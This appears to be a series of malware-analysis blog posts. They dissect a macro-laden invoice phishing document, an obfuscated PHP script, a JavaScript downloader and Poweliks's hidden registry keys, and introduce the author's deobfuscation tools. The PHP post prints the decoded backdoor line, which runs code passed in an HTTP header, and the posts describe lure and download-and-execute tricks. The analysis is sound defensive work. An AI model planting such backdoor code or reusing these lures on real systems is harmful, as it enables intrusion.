Malicious Word Macro Caught Using Sneaky Trick

There has been a slew of malicious Word documents attached to email purporting to be invoices, receipts, etc. This particular one caught my eye but I’m not sure if this is an old trick. I just haven’t seen this method used before and thought it was quite clever.

Here’s the email that had a zipped file attached. The zipped file contained a Word document. The email in poor English says, “Thank you for payment. Your invoice…is attached. Thank you for your business – we appreciate it very much.”

2015-03-06_01

Opening the Word document, first thing you’ll notice is the security warning and below it a bunch of garbled text. A message above it says, “If you document have incorrect encoding – enable macro.”

2015-03-06_02

Clicking on the “Enable Content” button then reveals the invoice, making this (slightly) more believable and possibly enough to convince the unsuspecting recipient.

2015-03-06_03

Using OfficeMalScanner, the macros, specifically the one called “ThisDocument” can be dumped to a file for analysis.

2015-03-06_04

Let’s try it with OleDump. It nicely shows the objects inside of the document.

2015-03-06_05

We can also dump the ‘ThisDocument’ object.

2015-03-06_06

Looking at the macro, we can see a bunch of string concatenation going on and typical garbage in between legitimate VBA code.

2015-03-06_07

A quarter ways in, there’s some URLs to take note of.

2015-03-06_08

Basically the VBA macro builds a VBS script and writes it out.

2015-03-06_09

Interestingly, this VBS calls up a Powershell file. How vogue. It’s now very clear what it’s doing — downloading and executing a file from Internet then downloading an image for statistics and cleaning up.

2015-03-06_10

Let me download the file…

2015-03-06_11

And see what VirusTotal has to say…

2015-03-06_12

Regarding that image download, here’s what it is:

2015-03-06_13

The image’s download stats are in that red box. Not sure how many are victims vs security folks but that could be an impressive number.

2015-03-06_14

Going back to the macro, I wanted to find out how it “decrypted” the gibberish into text. Near the bottom, I see reference to “findText” and “secondText” followed by some clean-up code.

2015-03-06_15

The findText subroutine shows that it looks for content between “<select></select>” tags then deletes it.

2015-03-06_16

The secondText routine looks for “<inbox></inbox>” tags and changes the contents’ font color to black.

2015-03-06_17

Ah! It’s not doing any decryption, it’s just some clever sleight of hand. The invoice text was there all along, hidden with white text. Here you can see the hidden content in green.

2015-03-06_18

Sneaky indeed.

Posted in Malicious Email, Malscript | Tagged , , , , , , | Comments Off

Deobfuscating a Wicked-Looking Script

Bart Blaze, one of my security researcher friends passed along this PHP script to me. Let’s have a look.

2015-03-03_01

It looks like PHP ate some Perl and barfed it out. First thing I asked myself is, “does this even run?” It looks like a mess but it actually runs just fine. This script makes clever use of bitwise operators. For example…

$YzuZ=n ^ ‘)'; // this equates to ‘G’

To make this readable, I split everything by semi-colon (except when it’s between quotes). One gotcha is that this script embeds comments (# and /* */) so you have to look very closely and either leave it alone…

2015-03-03_02

Or fix it up…

2015-03-03_03

After I cleaned it up, I noticed that the script boils down to the last two lines. So I just echo out each of the important variables:

2015-03-03_04

When the script is executed, I get the following values:

2015-03-03_05

Now I just replace the variable names with the corresponding values to get the final result. This creates a function with a value passed via the header (probably includes ‘preg_replace’) which turns this into a well-hidden backdoor.

if(md5(getenv(HTTP_A)) == 5d15db53a91790e913dc4e05a1319c42) $bIywY=create_function(‘$a, $b, $c’, getenv(HTTP_X_UP_CALLING_LINE_ID));
$bIywY(x1o6Vm2, WFrkAj9, QcFS0u);

Be sure you check out Bart’s blog to learn more about this particular script.

Posted in Malscript | Tagged , , | Comments Off

Revelo Updated

A colleague of mine received the following email in their Gmail in-box and wondered how it got past their filters and what it does.

2015-02-15_01

What almost tricked him was the fact that it called out his name. Only after looking at the originating email address did it make him pause. Good thing they didn’t spoof that. Let’s have a look at the attachment.

2015-02-15_02

It’s a Javascript file. Malicious scripts are hard to detect because it’s so easy to modify and customize. By the looks of this, it concatenates a value to the variable ‘a’ then jumps to another function. It keeps doing this until the very end then evals it. The problem is trying to find the “end”. Can you find it?

2015-02-15_03

First let’s deobfuscate this manually. You will need to find the end of all of the concatenation it’s doing then replace the eval with alert. After spending about a minute of eyeballing the script, I gave up. I did a search for “(a)” and found in the middle.

2015-02-15_04

Just change that to “alert(a)” and execute the file with your browser and you’ll see what it does.

2015-02-15_05

An easier way is just to append the short script at the end like this. When you run the script, you get the same result as above.

2015-02-15_06

The deobfuscated script, by the way, makes an AJAX call to a website at tripenjoy.com, downloads a unique file which poses as a JPEG image, renames it as an executable, then runs it.

2015-02-15_07

The downloaded file is definitely not a JPEG image.

2015-02-15_08

The payload keeps changing and the latest one I got was a nearly FUD malware according to VirusTotal.

2015-02-15_09

I’ve been meaning to update Revelo and this script prompted me to do it. The latest version allows you to deobfuscate these types of scripts quicker now by doing the same method we used above.

Run Revelo and paste in the Javascript (or open the file). Revelo needs the “<script></script>” tags so just click on Options > Add Script Tags and it will do so automatically.

2015-02-15_10

Choose the “Append Variable to End” method, type in “a” (the name of the variable we want to view) and click on Execute. Done!

2015-02-15_11

The second method I added is called “Intercept Return and Variable”. What this will do is intercept a user-specified variable that’s being returned from a function back to the caller.

Here’s an example. The script below passes a series of numbers to “CRYPT.obfuscate” then onto a “CRYPT.decode” function. The decode function decodes the values, converts it to a string then returns the deobfuscated result which has been highlighted in red.

2015-02-15_12

All you need to do is select the new method and enter “return output” and click on Execute. Done!

2015-02-15_13

I also added three more options to the menu:

2015-02-15_14

    * “Send Results to Prompt when Possible” – will try to display the results in this way: prompt(1,variable).
    * “Use Double Quote” – when trying various methods to deobfuscate a script, inserting single quotes into the script may mess things up so if this option is selected, double quotes will be used instead.
    * “Convert Object to Text” – simply appends “.text” to objects in order to convert them to text where appropriate.

The latest version of Revelo is available on the Tools page.

Posted in Malicious Email, Malscript, Tools | Tagged , , | Comments Off

Wild Wild West – 12/2014

Added the following packs:

Null Hole
“Hanjuan EK”
“Archie EK”
“Astrum EK”
“SedKit”
“SPL2 Pack”

Special thanks to Kafeine for his valuable input.

wildwildwest_1214

Posted in Exploit Packs | Comments Off

Registry Dumper – Find and Dump Hidden Registry Keys

The cybercriminals behind Poweliks implemented two clever techniques in their malware. The first was leveraging rundll32.dll to execute Javascript and the second was using a method to hide/protect their registry keys. I’ll be focusing on the second method.

The technique of hiding/protecting registry keys using a non-ASCII character goes all the way back to over a decade ago. It’s remarkable in a sense that after all these years, it still works on the latest Windows platform.

Here we see the built-in Windows Registry Editor choke on the hidden/protected key after infecting the computer with Poweliks.

2014-12-06_01

Clicking past the error dialog, you should see something like this. This default key is exposed and fully downloadable/viewable. However, there’s another key that contains the “trigger” that’s not visible.

2014-12-06_02

If we need to research what this particular malware is doing, we ought to find out what else is hiding there. For that we need to find a tool to help us view these hidden registry keys.

With online registry viewers/editors, you can get mixed results. Some seem to work well but lack some basic functionality like exporting keys as text. Others get confused and display the wrong key.

2014-12-06_03

2014-12-06_04

2014-12-06_05

Offline registry viewers/editors fare much better and offer consistent results. However, you will need to log into a separate account on the computer and use this tool. Or you have to copy the registry off of the infected machine and view it on a computer with the tool installed.

2014-12-06_06

I prefer to do an initial triage on the live machine and get to the data as quickly as possible. Since I couldn’t find a portable, online tool that had the features I wanted, I figure I would try my hand at creating one. The tool is called Registry Dumper and uses a DLL which interacts with the registry via NT native APIs that was written by Hoang Khanh Nguyen.

2014-12-06_07

This tool allows you to scan for null characters in a given path. It will iterate through the path to find all the keys with nulls in them.

2014-12-06_08

If you click on the “Show in Hex” checkbox, you can see the key names in hex. Here you will notice that the second entry’s name is “010001” which is equivalent to 0x01 0x00 0x01. This is impossible to view, edit, or delete using the Windows’ Registry Editor.

2014-12-06_09

From here you can copy/paste the path over to the left side and dump the keys to a text file.

2014-12-06_10

Here’s the text file containing all the key values in the given path.

2014-12-06_11

With this tool you can create hidden keys for testing purposes. And if you wanted to delete that impossible-to-remove key, you can use this tool by entering “[x01][null][x01]” as the key name.

2014-12-06_12

The obfuscated data you see there is the result of running it through Microsoft Script Encoder. To deobfuscate it, you can use an online decoder or download a VBS decoder. A fellow by the name of Lewis E. Moten III wrote a decoder program. I repackaged his function in the following tool.

2014-12-06_13

Here is the decoded version. You will notice that I didn’t have to strip away everything else but the encoded string. The decoder program will look for the start and end markers of the encoded text and replace it with the decoded result.

2014-12-06_14

Just recently, a newer variant of Poweliks was found. It uses a different registry hiding technique based on user permissions. You can read about it here.

If you use this tool to access one of these keys, you will get an error message saying that the key doesn’t exist. It does exist but it’s just that it doesn’t have the rights to view it.

2014-12-06_15

Here’s the permission properties of the key using the Windows Registry Editor. Notice that the current user has no read permissions.

2014-12-06_16

You can still use this tool to dump the keys but you first need to grant permission to the user account that’s running the tool. Just click on the Set Permission to User button and the permission is changed to allow the current user the rights.

2014-12-06_17

Now you can access the key:

2014-12-06_18

Here is the dump of the keys:

2014-12-06_19

And the decoded string:

2014-12-06_20

By the way, that Javascript in the “(Default)” key can be deobfuscated easily using Converter. You will see that the value in between the quotes are shifted over by one character (e.g. the word hello = ifmmp). Just enter the value “-1″ and click on the SHIFTx button (or you can click once on the minus button on the right).

2014-12-06_21

You can download both tools here.

Posted in Malscript, Tools | Tagged , , , | Comments Off